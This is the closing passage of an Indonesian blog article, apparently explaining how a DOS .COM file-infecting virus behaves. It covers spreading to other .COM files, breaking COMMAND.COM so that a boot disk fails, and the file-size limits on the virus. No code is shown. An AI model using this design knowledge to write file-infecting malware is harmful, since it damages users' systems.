Bila file yang telah tertular itu dijalankan, maka file itu
tidak dapat menjalankan fungsinya dan hanya akan menampilkan
pesan :”File ini telah tertular Virus komputer!”.Sebelumnya,
file tersebut akan menulari file COM lainnya.
Bila kebetulan file .COM pertama yang diserang didalam
directory utama adalah COMMAND.COM, maka setiap kali melakukan
boot dengan disket itu, tak akan pernah berhasil dan
sebelumnya virus akan menulari sebuah program COM lain yang
belum tertular.
Harap diperhatikan bahwa virus ini tidak dapat bekerja dengan
baik bila berada pada file COM yang ukurannya lebih kecil
daripada ukuran program virus yang asli, atau terlalu besar
(mendekati atau lebih dari FFFF heksadesimal = 64KB)
Ini disebabkan karena program virus tidak dapat disalin secara
lengkap atau buffer telah melampaui batas daerah CS (Code
Segment)
Demikianlah Artikel yang dapat saya sampaikan pada kesempatan
ini, Semoga informasi yang saya sampaikan dapat bermanfaat
bagi pengetahuan bagi kita semua ,khususnya bagi yang concern
terhadap virus.Sekian terima kasih cao……:) :) :)
Author : DANIEL[SSA]
Subscribe to:
Posts (Atom)